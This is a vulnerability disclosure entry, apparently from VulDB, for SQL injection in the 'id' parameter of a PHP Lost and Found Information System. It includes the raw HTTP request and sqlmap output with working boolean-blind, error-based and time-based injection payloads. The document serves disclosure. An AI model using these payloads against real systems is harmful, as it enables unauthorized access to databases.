| 제목 | SQL Injection in items/view_item Lost and Found Information System 1.0 |
|---|
| 설명 | Source: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
Product: Lost and Found Information System
Version: 1.0
POC_IMAGE: https://github.com/tht1997/CVE_2023/blob/main/Lost%20and%20Found%20Information%20System/img/view_item.png
Request vuln:
GET /php-lfis/admin/?page=items/view_item&id=16 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/php-lfis/admin/?page=items
Cookie: remember_me_name=bMGFrQaFzDhuoLmztZCT; remember_me_pwd=YMSm3Q2wFDHaHLQ5eZPKc42oU7CaK8IlA%40q1; remember_me_lang=en; Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680329430; Hm_lvt_5320b69f4f1caa9328dfada73c8e6a75=1680329567; PowerBB_username=xss; PowerBB_password=8879f85d0170cba2a4328bbb5a457c6a; menu_contracted=false; __atuvc=1%7C16; PHPSESSID=cjvq90aj2a5aaq7trm1s90ps9h
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Result SQLMAP:
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 431 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=items/view_item&id=16' AND 3876=3876 AND 'GXVC'='GXVC
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: page=items/view_item&id=16' OR (SELECT 7792 FROM(SELECT COUNT(*),CONCAT(0x716a626b71,(SELECT (ELT(7792=7792,1))),0x71766b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'nycu'='nycu
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=items/view_item&id=16' AND (SELECT 3771 FROM (SELECT(SLEEP(5)))ePGD) AND 'eaiq'='eaiq
---
|
|---|
| 원천 | ⚠️ https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html |
|---|
| 사용자 | huutuanbg97 (UID 45015) |
|---|
| 제출 | 2023. 05. 13. AM 05:58 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 05. 14. AM 09:59 (1 day later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 228980 [SourceCodester Lost and Found Information System 1.0 GET Parameter view_item 아이디 SQL 주입] |
|---|
| 포인트들 | 20 |
|---|